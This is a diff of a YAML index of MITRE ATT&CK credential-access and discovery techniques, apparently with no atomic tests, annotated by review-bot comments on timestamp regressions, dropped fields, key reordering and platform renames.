+ url: https://attack.mitre.org/techniques/T1056/004
+ external_id: T1056.004
+ - source_name: EyeofRa Detecting Hooking June 2017
+ description: 'Eye of Ra. (2017, June 27). Windows Keylogger Part 2: Defense
+ against user-land. Retrieved December 12, 2017.'
+ url: https://eyeofrablog.wordpress.com/2017/06/27/windows-keylogger-part-2-defense-against-user-land/
+ - source_name: Zairon Hooking Dec 2006
+ description: Felici, M. (2006, December 6). Any application-defined hook procedure
+ on my machine?. Retrieved December 12, 2017.
+ url: https://zairon.wordpress.com/2006/12/06/any-application-defined-hook-procedure-on-my-machine/
+ - source_name: GMER Rootkits
+ description: GMER. (n.d.). GMER. Retrieved December 12, 2017.
+ url: http://www.gmer.net/
+ - source_name: MWRInfoSecurity Dynamic Hooking 2015
+ description: 'Hillman, M. (2015, August 8). Dynamic Hooking Techniques: User
+ Mode. Retrieved December 20, 2017.'
+ url: https://www.mwrinfosecurity.com/our-thinking/dynamic-hooking-techniques-user-mode/
+ - source_name: Elastic Process Injection July 2017
+ description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques:
+ A Technical Survey Of Common And Trending Process Injection Techniques.
+ Retrieved December 7, 2017.'
+ url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
+ - source_name: HighTech Bridge Inline Hooking Sept 2011
+ description: Mariani, B. (2011, September 6). Inline Hooking in Windows. Retrieved
+ December 12, 2017.
+ url: https://www.exploit-db.com/docs/17802.pdf
+ - source_name: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017
+ description: Microsoft. (2017, September 15). TrojanSpy:Win32/Ursnif.gen!I.
+ Retrieved December 18, 2017.
+ url: https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanSpy:Win32/Ursnif.gen!I&threatId=-2147336918
+ - source_name: Microsoft Hook Overview
+ description: Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx
+ - source_name: Microsoft Process Snapshot
+ description: Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved
+ December 12, 2017.
+ url: https://msdn.microsoft.com/library/windows/desktop/ms686701.aspx
+ - source_name: PreKageo Winhook Jul 2011
+ description: Prekas, G. (2011, July 11). Winhook. Retrieved December 12, 2017.
+ url: https://github.com/prekageo/winhook
+ - source_name: Jay GetHooks Sept 2011
+ description: Satiro, J. (2011, September 14). GetHooks. Retrieved December
+ 12, 2017.
+ url: https://github.com/jay/gethooks
+ - source_name: StackExchange Hooks Jul 2012
+ description: Stack Exchange - Security. (2012, July 31). What are the methods
+ to find hooked functions and APIs?. Retrieved December 12, 2017.
+ url: https://security.stackexchange.com/questions/17904/what-are-the-methods-to-find-hooked-functions-and-apis
+ - source_name: Adlice Software IAT Hooks Oct 2014
+ description: 'Tigzy. (2014, October 15). Userland Rootkits: Part 1, IAT hooks.
+ Retrieved December 12, 2017.'
+ url: https://www.adlice.com/userland-rootkits-part-1-iat-hooks/
+ - source_name: Volatility Detecting Hooks Sept 2012
+ description: Volatility Labs. (2012, September 24). MoVP 3.1 Detecting Malware
+ Hooks in the Windows GUI Subsystem. Retrieved December 12, 2017.
+ url: https://volatility-labs.blogspot.com/2012/09/movp-31-detecting-malware-hooks-in.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1056.004
atomic_tests: []
T1552.007:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:25:28.820Z'
name: Kubernetes List Secrets
description: "Adversaries may gather credentials via APIs within a containers
environment. APIs in these environments, such as the Docker API and Kubernetes
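Review bot: T1056.004 loses `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) in this hunk, while T1556.004 later in the patch keeps its `x_mitre_permissions_required: Administrator`. If the field was intentionally removed upstream for techniques bumped to spec 3.2.0, that is consistent, but the mixed state should be called out; otherwise this looks like the regenerating tool dropping a field for some objects and not others. The rest of the hunk is a pure reorder of the existing external_references, which I checked entry by entry against the removed block.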
@@ -48703,9 +49423,8 @@ credential-access:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.007
atomic_tests: []
T1556.004:
@@ -48736,7 +49455,7 @@ credential-access:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
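Review bot: the `modified` timestamp for T1556.004 goes backwards, from 2022-05-11 to 2021-12-14, and the same regression appears in later hunks (T1613, T1016.001, T1615, T1652, T1069.002, T1007, T1120). Every replaced value shares the `T14:00:00.188Z` suffix, which looks like a release-level stamp, while the new values are finer-grained object timestamps; if that is the explanation this is expected, but the commit message should say so, because on its face the diff reads as syncing to an older snapshot.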
@@ -48760,8 +49479,6 @@ credential-access:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
discovery:
T1033:
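Review bot: T1556.004 loses `x_mitre_attack_spec_version: 2.1.0` without a replacement in this hunk, whereas every other technique in the patch ends up with 3.1.0 or 3.2.0 (compare the T1082 hunks, which move the key rather than drop it). Unless the key is set elsewhere in this object above the hunk, T1556.004 will be the only entry with no spec version; worth a quick check on the generated file.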
@@ -48826,12 +49543,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1033
atomic_tests: []
T1613:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-15T16:08:50.706Z'
name: Container and Resource Discovery
description: "Adversaries may attempt to discover containers and other resources
that are available within a containers environment. Other resources may include
@@ -48890,7 +49606,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1613
atomic_tests: []
T1016.001:
@@ -48911,7 +49626,7 @@ discovery:
- source_name: mitre-attack
external_id: T1016.001
url: https://attack.mitre.org/techniques/T1016/001
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-25T17:03:26.632Z'
name: 'System Network Configuration Discovery: Internet Connection Discovery'
description: |-
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert
, and GET requests to websites.
@@ -48932,13 +49647,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1016.001
atomic_tests: []
T1069:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:03:06.294Z'
name: Permission Groups Discovery
description: |-
Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.
@@ -48961,15 +49674,14 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '2.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.6'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Group: Group Metadata'
@@ -48995,13 +49707,12 @@ discovery:
url: https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1069.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:51:35.759Z'
name: Cloud Groups
description: |-
Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.
@@ -49026,12 +49737,11 @@ discovery:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
@@ -49073,13 +49783,12 @@ discovery:
url: https://github.com/True-Demon/raindance
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1615:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-01-06T12:41:08.579Z'
name: Group Policy Discovery
description: |-
Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016)
@@ -49140,12 +49849,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1615
atomic_tests: []
T1652:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:07:16.804Z'
name: Device Driver Discovery
description: |-
Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).
@@ -49209,19 +49917,18 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1652
atomic_tests: []
T1087.002:
technique:
- modified: '2024-04-15T21:33:57.732Z'
+ modified: '2024-05-31T04:00:37.651Z'
name: 'Account Discovery: Domain Account'
description: "Adversaries may attempt to get a listing of domain accounts. This
information can help adversaries determine which domain accounts exist to
aid in follow-on behavior such as targeting specific accounts which possess
particular privileges.\n\nCommands such as net user /domain
and
net group /domain
of the [Net](https://attack.mitre.org/software/S0039)
- utility, dscacheutil -q group
on macOS, and ldapsearch
+ utility, dscacheutil -q group
on macOS, and ldapsearch
on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001)
cmdlets including Get-ADUser
and Get-ADGroupMember
may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle
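Review bot: the two description lines changed for T1087.002 (`utility, dscacheutil -q group` / `on macOS, and ldapsearch`) are byte-for-byte identical in this view, so the actual change is whitespace or markup that does not survive display. If it is a trailing-space or tag difference in the source text it will reappear on every regeneration; either normalize it in the generator or note it so the next sync does not produce the same cosmetic churn.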
@@ -49268,7 +49975,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.002
atomic_tests: []
T1087.001:
@@ -49335,12 +50041,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1087.001
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -49430,18 +50135,17 @@ discovery:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1069.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:16:47.754Z'
name: 'Permission Groups Discovery: Domain Groups'
description: |-
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
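Review bot: the `Deloitte Environment Awareness` entry now points at the `/edit` form of the Google Drive link instead of the bare file URL. `/edit` is the editor view, so confirm it resolves for an anonymous reader the same way the previous link did; if it only works for accounts with edit access, the older URL (or a `/view` form) is the safer reference even if the retrieval date is refreshed.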
@@ -49484,12 +50188,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.002
atomic_tests: []
T1007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:55:18.326Z'
name: System Service Discovery
description: |-
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query
, tasklist /svc
, systemctl --type=service
, and net start
.
@@ -49530,12 +50233,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1007
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
@@ -49620,7 +50322,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests: []
T1135:
@@ -49682,12 +50383,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1135
atomic_tests: []
T1120:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:41.575Z'
name: Peripheral Device Discovery
description: 'Adversaries may attempt to gather information about attached peripheral
devices and components connected to a computer system.(Citation: Peripheral
@@ -49738,12 +50438,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_is_subtechnique: false
- spec_version: '2.1'
identifier: T1120
atomic_tests: []
T1082:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:42:22.247Z'
name: System Information Discovery
description: |-
An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
@@ -49754,7 +50453,6 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Maril Vernon @shewhohacks
- Praetorian
@@ -49769,7 +50467,6 @@ discovery:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- IaaS
@@ -49817,7 +50514,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1082
atomic_tests: []
T1016.002:
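Review bot: the three T1082 hunks above are mostly key reordering: `- x_mitre_attack_spec_version: 2.1.0` and `- x_mitre_modified_by_ref: identity--c78cb6e5-...` are removed from the middle of the object and re-added at the end, which buries the one real change (the bump to `+ x_mitre_attack_spec_version: 3.2.0`) in move noise. Emitting the `technique` mapping with a fixed key order in the generator (sorted keys, or the order of the upstream STIX object) would make future regenerations diff cleanly.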
@@ -49889,12 +50587,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016.002
atomic_tests: []
T1010:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-15T16:22:56.372Z'
name: Application Window Discovery
description: |-
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
@@ -49936,122 +50633,73 @@ discovery:
- source_name: Prevailion DarkWatchman 2021
description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
new evolution in fileless techniques. Retrieved January 10, 2022.'
- url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+ url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1010
atomic_tests: []
T1087.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
- type: attack-pattern
- created: '2020-02-21T21:08:33.237Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.003
- url: https://attack.mitre.org/techniques/T1087/003
- - source_name: Microsoft Exchange Address Lists
- url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
- description: Microsoft. (2020, February 7). Address lists in Exchange Server.
- Retrieved March 26, 2020.
- - source_name: Microsoft getglobaladdresslist
- url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
- description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
- 2019.
- - description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
- Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
- source_name: Black Hills Attacking Exchange MailSniper, 2016
- - source_name: Google Workspace Global Access List
- url: https://support.google.com/a/answer/166870?hl=en
- description: Google. (n.d.). Retrieved March 16, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-17T20:35:35.125Z'
name: Email Account
description: |-
Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
- In on-premises Exchange and Exchange Online, theGet-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
+ In on-premises Exchange and Exchange Online, the Get-GlobalAddressList
PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
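Review bot: for T1087.003 this hunk changes index content, not just formatting: the platform list goes from `Windows` / `Office 365` / `Google Workspace` to `Windows` / `Office Suite`, and `x_mitre_permissions_required: [User]` disappears entirely. Any consumer that keys on the old platform strings (per-platform index files, filters) will no longer match this technique, and anything reading permissions will find the field gone. Both follow the upstream ATT&CK schema changes that also bump `x_mitre_version` 1.1 → 1.2, so they are not a generator bug, but they deserve a line in the PR description. The remaining edits here are sound: the `description` whitespace fix (`theGet-GlobalAddressList` → `the Get-GlobalAddressList`) and the T1010 Prevailion reference now pointing at the `web.archive.org` snapshot of a dead URL.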
@@ -50066,6 +50714,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -50075,9 +50729,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50087,97 +50746,132 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
